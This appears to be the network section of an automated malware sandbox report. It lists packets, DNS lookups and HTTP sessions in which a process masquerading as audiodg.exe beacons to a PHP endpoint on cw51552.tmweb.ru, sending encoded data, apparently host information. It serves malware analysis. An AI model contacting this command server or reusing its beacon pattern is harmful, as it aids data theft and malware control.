Apr 3, 2021 05:42:03.493488073 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:03.535808086 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:04.505419970 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:04.580420971 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:04.587235928 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:04.629172087 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:05.600291014 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:05.675383091 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:05.682275057 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:05.723196030 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:06.693617105 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:06.769933939 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:06.775789976 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:06.816873074 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:07.822171926 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:07.898178101 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:07.904592037 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:07.957593918 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:08.911911011 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:08.991091967 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:08.998383045 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:09.051460028 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:10.006135941 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:10.081223965 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:10.088638067 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:10.129595995 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:11.100388050 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:11.175726891 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:11.182423115 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:11.223495960 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:12.193727016 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:12.268898964 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:12.275950909 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:12.317346096 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:13.287481070 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:13.362446070 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:13.369764090 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:13.411156893 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:14.381750107 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:14.456696987 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:14.463618994 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:14.505148888 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:15.475742102 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:15.551373959 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:15.558010101 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:15.599006891 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:16.574282885 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:16.649172068 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:16.657428026 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:16.708298922 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:17.669645071 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:17.744680882 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:17.766633987 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:17.817867041 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:19.069895029 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:19.145076990 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:19.152443886 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:19.192986965 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:20.163577080 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:20.240001917 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:20.247056007 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:20.302460909 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:21.257426977 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:21.332730055 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:21.341485023 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:21.396199942 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:22.351079941 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:22.427602053 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:22.435863018 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:22.490201950 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:23.445441961 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:23.520562887 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:23.526788950 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:23.568268061 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:24.539650917 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:24.614604950 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:24.652138948 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:24.708981991 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:25.663691998 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:25.740124941 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:25.746380091 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:25.787247896 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:26.758244038 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:26.833111048 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:26.839596987 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:26.881042004 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:27.851116896 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:27.926069021 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:27.933128119 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:27.975132942 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:28.945991039 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:29.021152973 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:29.028058052 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:29.068800926 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:30.039587021 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:30.114605904 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:30.121190071 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:30.162552118 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:31.133966923 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:31.208939075 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:31.215198994 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:31.256601095 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:32.235923052 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:32.310935974 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:32.317568064 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:32.365858078 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:33.399291992 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:33.475493908 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:33.482040882 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:33.537803888 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:34.492548943 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:34.567528963 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:34.573929071 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:34.616113901 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:35.586905003 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:35.662332058 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:35.669203997 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:35.709919930 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:36.769542933 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:36.844765902 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:36.851098061 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:36.897551060 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:37.869826078 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:37.949573994 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:37.955569983 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:38.007000923 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:38.961189985 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:39.036072969 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:39.043540001 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:39.085454941 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:40.055397034 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:40.061434984 CEST	49743	443	192.168.2.4	216.239.32.21
Apr 3, 2021 05:42:40.105107069 CEST	443	49743	216.239.32.21	192.168.2.4
Apr 3, 2021 05:42:40.107319117 CEST	443	49743	216.239.32.21	192.168.2.4
Apr 3, 2021 05:42:40.107424974 CEST	49743	443	192.168.2.4	216.239.32.21
Apr 3, 2021 05:42:40.130537987 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:40.136818886 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:40.178977966 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:41.149163961 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:41.224565983 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:41.232422113 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:41.272844076 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:42.243191957 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:42.318195105 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:42.325505972 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:42.366668940 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:43.337068081 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:43.413438082 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:43.422053099 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:43.476674080 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:44.510591030 CEST	49742	80	192.168.2.4	188.225.40.161
Apr 3, 2021 05:42:44.585534096 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:44.592495918 CEST	80	49742	188.225.40.161	192.168.2.4
Apr 3, 2021 05:42:44.648140907 CEST	49742	80	192.168.2.4	188.225.40.161

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 3, 2021 05:40:26.940813065 CEST	64646	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:40:26.989567041 CEST	53	64646	8.8.8.8	192.168.2.4
Apr 3, 2021 05:40:28.243355989 CEST	65298	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:40:28.297756910 CEST	53	65298	8.8.8.8	192.168.2.4
Apr 3, 2021 05:40:28.763046026 CEST	59123	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:40:28.818867922 CEST	53	59123	8.8.8.8	192.168.2.4
Apr 3, 2021 05:40:29.500052929 CEST	54531	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:40:29.554640055 CEST	53	54531	8.8.8.8	192.168.2.4
Apr 3, 2021 05:40:30.749002934 CEST	49714	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:40:30.794869900 CEST	53	49714	8.8.8.8	192.168.2.4
Apr 3, 2021 05:40:32.461040974 CEST	58028	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:40:32.506997108 CEST	53	58028	8.8.8.8	192.168.2.4
Apr 3, 2021 05:40:33.425714970 CEST	53097	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:40:33.474383116 CEST	53	53097	8.8.8.8	192.168.2.4
Apr 3, 2021 05:40:34.705539942 CEST	49257	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:40:34.751384020 CEST	53	49257	8.8.8.8	192.168.2.4
Apr 3, 2021 05:40:35.994765043 CEST	62389	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:40:36.049050093 CEST	53	62389	8.8.8.8	192.168.2.4
Apr 3, 2021 05:40:37.022625923 CEST	49910	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:40:37.068847895 CEST	53	49910	8.8.8.8	192.168.2.4
Apr 3, 2021 05:40:38.301774025 CEST	55854	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:40:38.347748041 CEST	53	55854	8.8.8.8	192.168.2.4
Apr 3, 2021 05:40:40.711298943 CEST	64549	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:40:40.765700102 CEST	53	64549	8.8.8.8	192.168.2.4
Apr 3, 2021 05:40:42.964673996 CEST	63153	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:40:43.018892050 CEST	53	63153	8.8.8.8	192.168.2.4
Apr 3, 2021 05:40:44.275674105 CEST	52991	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:40:44.332906961 CEST	53	52991	8.8.8.8	192.168.2.4
Apr 3, 2021 05:40:45.218657017 CEST	53700	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:40:45.267508030 CEST	53	53700	8.8.8.8	192.168.2.4
Apr 3, 2021 05:40:46.221872091 CEST	51726	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:40:46.276129007 CEST	53	51726	8.8.8.8	192.168.2.4
Apr 3, 2021 05:40:47.396095037 CEST	56794	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:40:47.443372965 CEST	53	56794	8.8.8.8	192.168.2.4
Apr 3, 2021 05:40:48.928361893 CEST	56534	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:40:48.986840010 CEST	53	56534	8.8.8.8	192.168.2.4
Apr 3, 2021 05:40:50.010366917 CEST	56627	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:40:50.057566881 CEST	53	56627	8.8.8.8	192.168.2.4
Apr 3, 2021 05:40:51.026549101 CEST	56621	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:40:51.075295925 CEST	53	56621	8.8.8.8	192.168.2.4
Apr 3, 2021 05:40:57.813405037 CEST	63116	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:40:57.859355927 CEST	53	63116	8.8.8.8	192.168.2.4
Apr 3, 2021 05:41:09.525346994 CEST	64078	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:41:09.581131935 CEST	53	64078	8.8.8.8	192.168.2.4
Apr 3, 2021 05:41:10.088273048 CEST	64801	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:41:10.177448988 CEST	53	64801	8.8.8.8	192.168.2.4
Apr 3, 2021 05:41:15.243515968 CEST	61721	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:41:15.290523052 CEST	53	61721	8.8.8.8	192.168.2.4
Apr 3, 2021 05:41:21.424782038 CEST	51255	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:41:21.478960037 CEST	53	51255	8.8.8.8	192.168.2.4
Apr 3, 2021 05:41:23.662767887 CEST	61522	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:41:23.708599091 CEST	53	61522	8.8.8.8	192.168.2.4
Apr 3, 2021 05:41:23.800914049 CEST	52337	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:41:23.855108976 CEST	53	52337	8.8.8.8	192.168.2.4
Apr 3, 2021 05:41:25.106432915 CEST	55046	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:41:25.152338028 CEST	53	55046	8.8.8.8	192.168.2.4
Apr 3, 2021 05:41:34.077157974 CEST	49612	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:41:34.138828993 CEST	53	49612	8.8.8.8	192.168.2.4
Apr 3, 2021 05:41:34.651066065 CEST	49285	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:41:34.891037941 CEST	53	49285	8.8.8.8	192.168.2.4
Apr 3, 2021 05:41:35.405967951 CEST	50601	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:41:35.462799072 CEST	53	50601	8.8.8.8	192.168.2.4
Apr 3, 2021 05:41:35.836940050 CEST	60875	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:41:35.891159058 CEST	53	60875	8.8.8.8	192.168.2.4
Apr 3, 2021 05:41:36.324640036 CEST	56448	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:41:36.381927013 CEST	53	56448	8.8.8.8	192.168.2.4
Apr 3, 2021 05:41:36.814789057 CEST	59172	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:41:36.869090080 CEST	53	59172	8.8.8.8	192.168.2.4
Apr 3, 2021 05:41:37.238687992 CEST	62420	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:41:37.295887947 CEST	53	62420	8.8.8.8	192.168.2.4
Apr 3, 2021 05:41:37.837305069 CEST	60579	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:41:37.891607046 CEST	53	60579	8.8.8.8	192.168.2.4
Apr 3, 2021 05:41:38.211724043 CEST	50183	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:41:38.275161028 CEST	53	50183	8.8.8.8	192.168.2.4
Apr 3, 2021 05:41:38.534553051 CEST	61531	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:41:38.591420889 CEST	53	61531	8.8.8.8	192.168.2.4
Apr 3, 2021 05:41:38.964952946 CEST	49228	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:41:39.019057989 CEST	53	49228	8.8.8.8	192.168.2.4
Apr 3, 2021 05:41:39.485812902 CEST	59794	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:41:39.541594982 CEST	53	59794	8.8.8.8	192.168.2.4
Apr 3, 2021 05:42:18.786518097 CEST	55916	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:42:18.832288027 CEST	53	55916	8.8.8.8	192.168.2.4
Apr 3, 2021 05:42:19.709218979 CEST	52752	53	192.168.2.4	8.8.8.8
Apr 3, 2021 05:42:19.783041954 CEST	53	52752	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 3, 2021 05:41:10.088273048 CEST	192.168.2.4	8.8.8.8	0x808a	Standard query (0)	cw51552.tmweb.ru	A (IP address)	IN (0x0001)
Apr 3, 2021 05:41:15.243515968 CEST	192.168.2.4	8.8.8.8	0xc18b	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Apr 3, 2021 05:41:10.177448988 CEST	8.8.8.8	192.168.2.4	0x808a	No error (0)	cw51552.tmweb.ru	188.225.40.161	A (IP address)	IN (0x0001)
Apr 3, 2021 05:41:15.290523052 CEST	8.8.8.8	192.168.2.4	0xc18b	No error (0)	ipinfo.io	216.239.32.21	A (IP address)	IN (0x0001)
Apr 3, 2021 05:41:15.290523052 CEST	8.8.8.8	192.168.2.4	0xc18b	No error (0)	ipinfo.io	216.239.36.21	A (IP address)	IN (0x0001)
Apr 3, 2021 05:41:15.290523052 CEST	8.8.8.8	192.168.2.4	0xc18b	No error (0)	ipinfo.io	216.239.38.21	A (IP address)	IN (0x0001)
Apr 3, 2021 05:41:15.290523052 CEST	8.8.8.8	192.168.2.4	0xc18b	No error (0)	ipinfo.io	216.239.34.21	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

cw51552.tmweb.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49742	188.225.40.161	80	C:\Windows\AppReadiness\audiodg.exe

Timestamp	kBytes transferred	Direction	Data
Apr 3, 2021 05:41:10.324132919 CEST	1237	OUT	GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&f06dddd6da1af50c4d2046ad80cd0bd3=7406d4e040947858aca2d8984e05343c&ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23 HTTP/1.1 Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1 Host: cw51552.tmweb.ru Connection: Keep-Alive
Apr 3, 2021 05:41:10.405630112 CEST	1239	IN	HTTP/1.1 200 OK Server: nginx/1.16.1 Date: Sat, 03 Apr 2021 03:41:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 71 Connection: keep-alive Data Raw: 7b 22 36 32 32 39 63 61 30 66 32 61 32 63 63 33 30 66 66 35 36 36 31 63 30 65 35 61 66 66 38 38 31 34 22 3a 22 66 36 32 65 37 66 33 32 37 66 38 62 37 66 66 36 65 63 34 36 30 63 30 32 31 32 37 63 65 64 65 35 22 7d Data Ascii: {"6229ca0f2a2cc30ff5661c0e5aff8814":"f62e7f327f8b7ff6ec460c02127cede5"}
Apr 3, 2021 05:41:10.432812929 CEST	1239	OUT	GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&c1867ab1f3ddc7e3f363557f83cd2055=538f85528a6efd277c2f8b4d2790cd41&c01989751a368db0cb0d8cfc3a15fd41=QZiZGNwE2YhdjZ2cjYzcTMkRTZkFDO5UjNzUDO2gjZkJmMyE2MzAzN&ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23 HTTP/1.1 Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1 Host: cw51552.tmweb.ru
Apr 3, 2021 05:41:10.515990973 CEST	1240	IN	HTTP/1.1 200 OK Server: nginx/1.16.1 Date: Sat, 03 Apr 2021 03:41:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 245 Connection: keep-alive Data Raw: 7b 22 30 66 61 62 63 31 65 61 65 63 35 37 63 62 30 62 62 31 65 66 37 34 66 31 33 39 39 33 64 36 31 38 22 3a 22 31 37 35 37 30 32 39 31 36 33 30 31 33 35 65 62 64 38 63 31 30 63 64 33 63 36 36 30 32 61 61 66 35 35 37 34 64 35 62 34 64 32 64 39 61 30 38 35 32 31 37 35 63 62 22 2c 22 36 32 32 39 63 61 30 66 32 61 32 63 63 33 30 66 66 35 36 36 31 63 30 65 35 61 66 66 38 38 31 34 22 3a 22 66 31 39 33 32 39 36 38 34 62 32 37 33 66 66 66 30 63 37 35 63 66 38 63 30 38 39 38 65 39 32 34 22 2c 22 34 61 33 61 63 30 66 37 62 36 64 33 65 39 36 38 35 39 32 63 64 37 38 64 63 64 34 30 32 65 38 36 22 3a 22 3d 41 6c 63 76 5a 58 61 6b 56 6d 63 51 46 32 59 72 56 47 64 77 4a 33 62 6a 56 32 63 7a 39 6d 63 6e 56 6d 62 6c 4a 58 59 30 39 6d 63 22 7d Data Ascii: {"0fabc1eaec57cb0bb1ef74f13993d618":"17570291630135ebd8c10cd3c6602aaf5574d5b4d2d9a0852175cb","6229ca0f2a2cc30ff5661c0e5aff8814":"f19329684b273fff0c75cf8c0898e924","4a3ac0f7b6d3e968592cd78dcd402e86":"=AlcvZXakVmcQF2YrVGdwJ3bjV2cz9mcnVmblJXY09mc"}
Apr 3, 2021 05:41:19.555469036 CEST	1247	OUT	GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1 Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1 Host: cw51552.tmweb.ru
